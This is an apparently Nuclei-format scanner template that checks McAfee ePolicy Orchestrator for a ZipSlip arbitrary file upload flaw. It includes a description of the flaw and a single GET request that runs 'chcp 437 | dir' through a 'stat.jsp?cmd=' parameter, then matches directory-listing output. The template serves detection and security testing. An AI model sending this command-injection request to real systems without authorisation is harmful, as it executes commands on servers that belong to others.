id: mcafee-epo-rce

info:
  name: McAfee ePolicy Orchestrator - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction.
  reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
  tags: mcafee,rce,

requests:
  - method: GET
    path:
      - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "text/html"
        part: header
      - type: regex
        regex:
          - "Volume (in drive [A-Z]|Serial Number) is"
        part: body

# Enhanced by mp on 2022/07/27